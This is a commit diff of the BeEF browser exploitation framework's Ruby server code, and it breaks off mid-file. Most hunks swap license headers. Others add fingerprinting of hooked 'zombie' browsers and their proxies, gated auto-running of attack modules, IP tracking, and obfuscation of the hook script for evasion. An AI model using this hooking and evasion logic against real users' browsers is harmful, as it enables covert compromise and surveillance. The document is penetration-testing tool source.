# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/constants/commandmodule.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/constants/distributedengine.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

22
core/main/constants/hardware.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -22,6 +12,8 @@ module Constants
module Hardware
HW_UNKNOWN_IMG = 'pc.png'
HW_VM_IMG = 'vm.png'
HW_LAPTOP_IMG = 'laptop.png'
HW_IPHONE_UA_STR = 'iPhone'
HW_IPHONE_IMG = 'iphone.jpg'
HW_IPAD_UA_STR = 'iPad'
@@ -42,8 +34,8 @@ module Constants
HW_HTC_IMG = 'htc.ico'
HW_MOTOROLA_UA_STR = 'motorola'
HW_MOTOROLA_IMG = 'motorola.png'
HW_GOOGLE_UA_STR = 'Nexus One'
HE_GOOGLE_IM = 'nexus.png'
HW_GOOGLE_UA_STR = 'Nexus'
HW_GOOGLE_IMG = 'nexus.png'
HW_ERICSSON_UA_STR = 'Ericsson'
HW_ERICSSON_IMG = 'sony_ericsson.png'
HW_ALL_UA_STR = 'All'

16
core/main/constants/os.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/crypto.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/distributed_engine/models/rules.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

176
core/main/handlers/browserdetails.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -34,6 +24,9 @@ module BeEF
end
def setup()
print_debug "[INIT] Processing Browser Details..."
config = BeEF::Core::Configuration.instance
# validate hook session value
session_id = get_param(@data, 'beefhook')
(self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id)
@@ -75,6 +68,7 @@ module BeEF
}
zombie.httpheaders = @http_headers.to_json
zombie.save
#puts "HTTP Headers: #{zombie.httpheaders}"
# add a log entry for the newly hooked browser
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -86,6 +80,56 @@ module BeEF
self.err_msg "Invalid browser name returned from the hook browser's initial connection."
end
# detect browser proxy
using_proxy = false
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'PROXY_CONNECTION',
'PROXY_AUTHENTICATE',
'X_FORWARDED',
'X_FORWARDED_FOR',
'VIA'
].each do |header|
unless JSON.parse(zombie.httpheaders)[header].nil?
using_proxy = true
break
end
end
# retrieve proxy client IP
proxy_clients = []
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'X_FORWARDED',
'X_FORWARDED_FOR'
].each do |header|
proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
end
# retrieve proxy server
proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
# store and log proxy details
if using_proxy == true
BD.set(session_id, 'UsingProxy', "#{using_proxy}")
proxy_log_string = "#{zombie.ip} is using a proxy"
unless proxy_clients.nil?
BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
end
unless proxy_server.nil?
BD.set(session_id, 'ProxyServer', "#{proxy_server}")
proxy_log_string += " [server: #{proxy_server}]"
end
BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
end
# get and store browser version
browser_version = get_param(@data['results'], 'BrowserVersion')
if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -175,11 +219,11 @@ module BeEF
end
# get and store the system platform
system_platform = get_param(@data['results'], 'SystemPlatform')
system_platform = get_param(@data['results'], 'BrowserPlatform')
if BeEF::Filters.is_valid_system_platform?(system_platform)
BD.set(session_id, 'SystemPlatform', system_platform)
BD.set(session_id, 'BrowserPlatform', system_platform)
else
self.err_msg "Invalid system platform returned from the hook browser's initial connection."
self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
end
# get and store the hooked browser type
@@ -206,14 +250,6 @@ module BeEF
self.err_msg "Invalid window size returned from the hook browser's initial connection."
end
# get and store the yes|no value for JavaEnabled
java_enabled = get_param(@data['results'], 'JavaEnabled')
if BeEF::Filters.is_valid_yes_no?(java_enabled)
BD.set(session_id, 'JavaEnabled', java_enabled)
else
self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
end
# get and store the yes|no value for VBScriptEnabled
vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
if BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
@@ -246,6 +282,14 @@ module BeEF
self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasFoxit
has_foxit = get_param(@data['results'], 'HasFoxit')
if BeEF::Filters.is_valid_yes_no?(has_foxit)
BD.set(session_id, 'HasFoxit', has_foxit)
else
self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWebSocket
has_web_socket = get_param(@data['results'], 'HasWebSocket')
if BeEF::Filters.is_valid_yes_no?(has_web_socket)
@@ -254,6 +298,14 @@ module BeEF
self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWebRTC
has_webrtc = get_param(@data['results'], 'HasWebRTC')
if BeEF::Filters.is_valid_yes_no?(has_webrtc)
BD.set(session_id, 'HasWebRTC', has_webrtc)
else
self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasActiveX
has_activex = get_param(@data['results'], 'HasActiveX')
if BeEF::Filters.is_valid_yes_no?(has_activex)
@@ -262,6 +314,54 @@ module BeEF
self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasSilverlight
has_silverlight = get_param(@data['results'], 'HasSilverlight')
if BeEF::Filters.is_valid_yes_no?(has_silverlight)
BD.set(session_id, 'HasSilverlight', has_silverlight)
else
self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasQuickTime
has_quicktime = get_param(@data['results'], 'HasQuickTime')
if BeEF::Filters.is_valid_yes_no?(has_quicktime)
BD.set(session_id, 'HasQuickTime', has_quicktime)
else
self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasRealPlayer
has_realplayer = get_param(@data['results'], 'HasRealPlayer')
if BeEF::Filters.is_valid_yes_no?(has_realplayer)
BD.set(session_id, 'HasRealPlayer', has_realplayer)
else
self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWMP
has_wmp = get_param(@data['results'], 'HasWMP')
if BeEF::Filters.is_valid_yes_no?(has_wmp)
BD.set(session_id, 'HasWMP', has_wmp)
else
self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
end
# get and store the value for CPU
cpu_type = get_param(@data['results'], 'CPU')
if !cpu_type.nil?
BD.set(session_id, 'CPU', cpu_type)
else
self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
end
# get and store the value for TouchEnabled
touch_enabled = get_param(@data['results'], 'TouchEnabled')
if BeEF::Filters.is_valid_yes_no?(touch_enabled)
BD.set(session_id, 'TouchEnabled', touch_enabled)
else
self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
end
# get and store whether the browser has session cookies enabled
has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
if BeEF::Filters.is_valid_yes_no?(has_session_cookies)
@@ -283,19 +383,25 @@ module BeEF
# Call autorun modules
autorun = []
BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
if v.has_key?('autorun') and v['autorun'] == true
if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
BeEF::Module.execute(k, session_id)
autorun.push(k)
else
print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}"
if config.get('beef.autorun.enable')
autorun = []
BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
if v.has_key?('autorun') and v['autorun'] == true
target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
BeEF::Module.execute(k, session_id)
autorun.push(k)
elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
BeEF::Module.execute(k, session_id)
autorun.push(k)
else
print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
end
end
}
if autorun.length > 0
print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
end
}
if autorun.length > 0
print_info "Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}"
end
end

16
core/main/handlers/commands.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

34
core/main/handlers/hookedbrowsers.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -61,13 +51,25 @@ module Handlers
# @note is a known browser so send instructions
else
# @note Check if we haven't seen this browser for a while, log an event if we haven't
if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
end
# @note record the last poll from the browser
hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event
if hooked_browser.ip != request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
hooked_browser.ip = request.ip
if config.get('beef.http.use_x_forward_for') == true
if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
end
else
if hooked_browser.ip != request.ip
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
hooked_browser.ip = request.ip
end
end
hooked_browser.count!

48
core/main/handlers/modules/beefjs.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -31,16 +21,18 @@ module BeEF
beef_js_path = "#{$root_dir}/core/main/client/"
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
# @note BeEF libraries: need Eruby evaluation and obfuscation
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
# @note Load websocket library only if WS server is enabled in config.yaml
if config.get("beef.http.websocket.enable") == false
# @note BeEF libraries: need Eruby evaluation and obfuscation #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
else #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
if config.get("beef.http.websocket.enable") == true
beef_js_sub_files << "websocket.js"
end
# @note antisnatchor: leave timeout.js as the last one!
beef_js_sub_files << "timeout.js"
ext_js_to_obfuscate = ''
ext_js_to_not_obfuscate = ''
@@ -74,11 +66,24 @@ module BeEF
hook_session_config = BeEF::Core::Server.instance.to_h
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
unless hook_session_config['beef_public'].nil?
if hook_session_config['beef_host'] != hook_session_config['beef_public']
hook_session_config['beef_host'] = hook_session_config['beef_public']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
end
end
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note set the hook file path and BeEF's cookie name
hook_session_config['hook_file'] = config.get("beef.http.hook_file")
hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
@@ -94,7 +99,7 @@ module BeEF
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout")
hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
end
@@ -104,8 +109,7 @@ module BeEF
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
else
@final_hook = ext_js_to_not_obfuscate + @hook
end

32
core/main/handlers/modules/command.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -61,19 +51,11 @@ module BeEF
#todo antisnatchor: remove this gsub crap adding some hook packing.
if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
#content = command_module.output.gsub('//
#// Copyright 2012 Wade Alcorn wade@bindshell.net
#//
#// Licensed under the Apache License, Version 2.0 (the "License");
#// you may not use this file except in compliance with the License.
#// You may obtain a copy of the License at
#// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
#// Browser Exploitation Framework (BeEF) - http://beefproject.com
#// See the file 'doc/COPYING' for copying permission
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in writing, software
#// distributed under the License is distributed on an "AS IS" BASIS,
#// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#// See the License for the specific language governing permissions and
#// limitations under the License.
#//', "")
ws.send(@output, hooked_browser.session)
else
@@ -82,7 +64,7 @@ module BeEF
# @note prints the event to the console
if BeEF::Settings.console?
name = command_module.friendlyname || kclass
print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module '#{name}'"
print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']"
end
# @note flag that the command has been sent to the hooked browser

16
core/main/logger.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/migration.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

22
core/main/models/browserdetails.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -90,6 +80,7 @@ module Models
return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -101,7 +92,6 @@ module Models
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end
@@ -113,7 +103,9 @@ module Models
def self.hw_icon(session_id)
ua_string = get(session_id, 'BrowserReportedName')
hardware = get(session_id, 'Hardware')
return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR

20
core/main/models/command.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
@@ -65,11 +55,11 @@ module Models
command.save
# @note log that the result was returned
BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
# @note prints the event into the console
if BeEF::Settings.console?
print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module '#{command_friendly_name}'"
print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
end
end

16
core/main/models/commandmodule.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/hookedbrowser.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/models/log.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
